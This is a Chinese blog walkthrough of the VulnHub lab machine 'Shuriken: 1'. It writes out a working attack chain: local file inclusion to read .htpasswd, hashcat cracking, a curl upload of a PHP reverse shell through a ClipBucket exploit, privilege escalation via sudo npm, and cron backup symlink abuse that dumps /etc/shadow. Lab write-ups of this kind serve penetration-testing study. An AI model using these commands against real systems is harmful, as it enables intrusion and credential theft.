当前位置:网站首页>Shuriken: 1 vulnhub walkthrough
Shuriken: 1 vulnhub walkthrough
2022-08-02 03:25:00 【xdeclearn】
Shuriken: 1
vulnhub地址:http://www.vulnhub.com/entry/shuriken-1,600/
0x01 信息收集到获取shell
服务器只开放了80端口,dirb爬取目录。
==> DIRECTORY: http://192.168.56.121/css/
==> DIRECTORY: http://192.168.56.121/img/
+ http://192.168.56.121/index.php (CODE:200|SIZE:6021)
==> DIRECTORY: http://192.168.56.121/js/
==> DIRECTORY: http://192.168.56.121/secret/
最初以为secret目录下secret.png图片做了信息隐藏,一顿操作没有找到任何信息。反过来查看index.php页面的js,发现了有意思的东西。
修改
hosts
后访问http://broadcast.shuriken.local
,发现需要basic auth
。
于是尝试另一个请求
http://shuriken.local/index.php?referer=
,读取到了apache2的默认配置文件/etc/apache2/sites-enabled/000-default.conf
。
继续读/etc/apach2/.htpasswd
,得到了用户名和加密密码developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0
。
用hashcat结合rockyou字典破解密码为9972761drmfsls
。
[email protected]:~$ hashcat -m 1600 -a 0 1.txt /usr/share/wordlists/rockyou.txt --show
$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0:9972761drmfsls
进入系统,发现是clipbucket4.0。
在exploit-db上搜到一个利用:https://www.exploit-db.com/exploits/44250
,成功上传shell。
[email protected]:~$ curl --basic --user "developers:9972761drmfsls" -F "[email protected]_reverse_shell.php" -F "plupload=1" -F "name=anyname.php" http://broadcast.shuriken.local/actions/beats_uploader.php
{
"success":"yes","file_name":"160691880796e48b","extension":"php","file_directory":"CB_BEATS_UPLOAD_DIR"}
[email protected]:~$ nc -lp 8080
Linux shuriken 5.4.0-47-generic #51~18.04.1-Ubuntu SMP Sat Sep 5 14:35:50 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
15:20:42 up 1:52, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM [email protected] IDLE JCPU PCPU WHAT
root tty1 - 13:28 15:30 0.35s 0.35s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
0x02 提权至server-management
查看sudo -l
,发现可以执行npm
,这里利用npm run
功能,成功切换到用户server-management。
先生成一个package.json
,内容为:
{
"scripts":{
"dev": "/bin/bash"
}
}
在相同目录下执行命令sudo -u server-management npm run dev
,得到第一个flag。
$ cat package.json
{
"scripts":{
"dev":"/bin/bash"}}
$ sudo -u server-management npm run dev
> @ dev /tmp/test
> /bin/bash
id
uid=1000(server-management) gid=1000(server-management) groups=1000(server-management),24(cdrom),30(dip),46(plugdev),116(lpadmin),122(sambashare)
cd /home/server-management
cat user.txt
67528b07b382dfaa490f4dffc57dcdc0
0x03 提权至root
上传运行pspy64
发现了以下奇怪的进程:
2020/12/03 06:04:01 CMD: UID=0 PID=2772 | /bin/bash /var/opt/backupsrv.sh
查看backupsrv.sh
:
[email protected]:/var/opt$ cat backupsrv.sh
cat backupsrv.sh
#!/bin/bash
# Where to backup to.
dest="/var/backups"
# What to backup.
cd /home/server-management/Documents
backup_files="*"
# Create archive filename.
day=$(date +%A)
hostname=$(hostname -s)
archive_file="$hostname-$day.tgz"
# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"
date
echo
# Backup the files using tar.
tar czf $dest/$archive_file $backup_files
# Print end status message.
echo
echo "Backup finished"
date
# Long listing of files in $dest to check file sizes.
ls -lh $dest
观察了一下,该sh大概每分钟会被执行一次,由于sh中参数不能修改,于是这里删除了/home/server-management/Documents
文件夹,做了/etc
到Documents
的软连接,压缩成功后将其拷贝到/var/www/main
(注意:需切换到www-data用户),下载后获取到shadow
文件。
# 软连接前
-rw-r--r-- 1 root root 49331 Dec 3 06:20 shuriken-Thursday.tgz
[email protected]:/var/backups$ rm ~/Documents -rf
[email protected]:/var/backups$ ln -s /etc /home/server-management/Documents
# 软连接后
-rw-r--r-- 1 root root 1124824 Dec 3 06:22 shuriken-Thursday.tgz
[email protected]:~/Downloads/test/shuriken-Thursday$ cat shadow
root:$6$KEYGm0ZQ$oTT3SYXna/5H61MZCwqvY995xtDqHGaMe5LRrMXNtVLLDVwfoj.DtJ0AQk6wfhAfOW23uR6wqd7UC5I7MPq0a0:18522:0:99999:7:::
daemon:*:18522:0:99999:7:::
bin:*:18522:0:99999:7:::
sys:*:18522:0:99999:7:::
sync:*:18522:0:99999:7:::
games:*:18522:0:99999:7:::
man:*:18522:0:99999:7:::
lp:*:18522:0:99999:7:::
mail:*:18522:0:99999:7:::
news:*:18522:0:99999:7:::
uucp:*:18522:0:99999:7:::
proxy:*:18522:0:99999:7:::
www-data:*:18522:0:99999:7:::
backup:*:18522:0:99999:7:::
list:*:18522:0:99999:7:::
irc:*:18522:0:99999:7:::
gnats:*:18522:0:99999:7:::
nobody:*:18522:0:99999:7:::
systemd-network:*:18522:0:99999:7:::
systemd-resolve:*:18522:0:99999:7:::
syslog:*:18522:0:99999:7:::
messagebus:*:18522:0:99999:7:::
_apt:*:18522:0:99999:7:::
uuidd:*:18522:0:99999:7:::
lightdm:*:18522:0:99999:7:::
whoopsie:*:18522:0:99999:7:::
kernoops:*:18522:0:99999:7:::
pulse:*:18522:0:99999:7:::
avahi:*:18522:0:99999:7:::
hplip:*:18522:0:99999:7:::
server-management:$6$.KeNqlcH$7vLzfrtf2GWWJ.32ZN0mMTJhHlYDE9PQsbrqkcgpnXDAv9hW27b1D/tC/XD1rsN29.DKFXVEqWgVtZxwvSTgE0:18522:0:99999:7:::
vboxadd:!:18522::::::
mysql:!:18522:0:99999:7:::
hashcat一时没跑出来,算了,重复上面的步骤,将/root
文件夹下下来,得到新的flag。
[email protected]:~/Downloads/test$ cat root.txt
d0f9655a4454ac54e3002265d40b2edd
__
____ ____ ____ ________________ _/ |_ ______
_/ ___\/ _ \ / \ / ___\_ __ \__ \\ __\/ ___/
\ \__( <_> ) | \/ /_/ > | \// __ \| | \___ \
\___ >____/|___| /\___ /|__| (____ /__| /____ >
\/ \//_____/ \/ \/
__ .___
___.__. ____ __ __ _______ ____ _____/ |_ ____ __| _/
< | |/ _ \| | \ \_ __ \/ _ \ / _ \ __\/ __ \ / __ |
\___ ( <_> ) | / | | \( <_> | <_> ) | \ ___// /_/ |
/ ____|\____/|____/ |__| \____/ \____/|__| \___ >____ |
\/ \/ \/
_________.__ .__ __
/ _____/| |__ __ _________|__| | __ ____ ____
\_____ \ | | \| | \_ __ \ | |/ // __ \ / \
/ \| Y \ | /| | \/ | <\ ___/| | \
/_______ /|___| /____/ |__| |__|__|_ \\___ >___| /
\/ \/ \/ \/ \/
边栏推荐
- DVWA drone installation tutorial
- (1)Thinkphp6入门、安装视图、模板渲染、变量赋值
- Xiaoyao multi-open emulator ADB driver connection
- PHP8.2的版本发布管理员和发布计划
- After the mailbox of the Pagoda Post Office is successfully set up, it can be sent but not received.
- (2)Thinkphp6模板引擎**标签
- vim编辑模式
- 使用PHPMailer发送邮件
- 14.JS语句和注释,变量和数据类型
- Kali环境下Frida编写脚本智能提示
猜你喜欢
TypeScript 错误 error TS2469、error TS2731 解决办法
(2) Thinkphp6 template engine ** tag
(1) print()函数、转义字符、二进制与字符编码 、变量、数据类型、input()函数、运算符
阿里云服务器如何使用admin账户登录
PHP Foundation March Press Announcement Released
PHP8.2中字符串变量解析的新用法
(3)Thinkphp6数据库
SQL classification, DQL (Data Query Language), and corresponding SQL query statement demonstration
Several interesting ways to open PHP: from basic to perverted
hackmyvm-hopper walkthrough
随机推荐
vim edit mode
微信小程序开发视频加载:[渲染层网络层错误] Failed to load media
IO流、 编码表、 字符流、 字符缓冲流
2.PHP变量、输出、EOF、条件语句
17. JS conditional statements and loops, and data type conversion
When PHP initiates Alipay payment, the order information is garbled and solved
ES6三点运算符、数组方法、字符串扩展方法
SQL分类、DQL(数据查询语言)、以及相应SQL查询语句演示
PHP image compression to specified size
js预编译 GO 和AO
PHP的几个有趣的打开方式:从基本到变态
阿里云MySQL5.7安装以及部分主要问题(总和)
多线程(实现多线程、线程同步、生产者消费者)
Multithreading (implementing multithreading, thread synchronization, producer and consumer)
js eventLoop 事件循环机制
3. PHP data types, constants, strings and operators
SQL:DDL、DML、DQL、DCL相应介绍以及演示
Add a full image watermark to an image in PHP
解决uni-app 打包H5网站 下载图片问题
每日面试题 2022/7/28